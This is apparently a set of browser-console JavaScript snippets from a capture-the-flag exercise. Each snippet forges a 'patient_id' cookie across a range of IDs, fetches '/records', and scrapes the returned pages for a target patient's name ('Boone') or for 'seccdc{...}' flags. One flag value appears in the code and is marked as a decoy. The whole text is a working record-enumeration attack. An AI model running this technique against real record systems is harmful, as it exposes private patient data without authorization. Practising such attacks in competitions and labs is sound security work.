for (let i = 1; i <= 10; i++) {
  fetch("/records", { headers: { "cookie": "patient_id=" + i } })
    .then(res => res.text())
    .then(html => {
      const nameMatch = html.match(/<span class="user-name">(.*?)<\/span>/) || html.match(/Console - (.*?)<\/h/);
      const name = nameMatch ? nameMatch[1] : "Unknown";
      console.log(`ID ${i}: ${name}`);
      if (name.includes("Boone")) {
          console.log(`%c TARGET ACQUIRED: Boone is ID ${i}`, "color: yellow; background: black; font-size: 15px;");
      }
    });
}


for (let i = 1; i <= 10; i++) {
  fetch("/records", { headers: { "cookie": "patient_id=" + i } })
    .then(res => res.text())
    .then(text => {
      // This checks if the flag format exists in the page text
      const flagMatch = text.match(/seccdc\{.*?\}/);
      if (flagMatch) {
        console.log(`%c FOUND FLAG IN ID ${i}: ${flagMatch[0]}`, "color: black; background: #00ff00; font-weight: bold; padding: 5px;");
        // Also print the text around it to confirm it's Boone
        console.log("Context:", text.substring(text.indexOf(flagMatch[0]) - 50, text.indexOf(flagMatch[0]) + 100));
      } else {
        console.log(`ID ${i}: No flag found.`);
      }
    });
}

for (let i = 1; i <= 20; i++) {
  fetch("/records", { headers: { "cookie": "patient_id=" + i } })
    .then(res => res.text())
    .then(text => {
      // Look for any flag that IS NOT the one we just tried
      const flags = text.match(/seccdc\{.*?\}/g);
      if (flags) {
        flags.forEach(f => {
          if (f !== "seccdc{N5M6gqe3Nk5Z}") {
            console.log(`%c NEW FLAG FOUND IN ID ${i}: ${f}`, "color: white; background: red; font-weight: bold;");
          } else {
            console.log(`ID ${i} has the decoy flag.`);
          }
        });
      }
    });
}
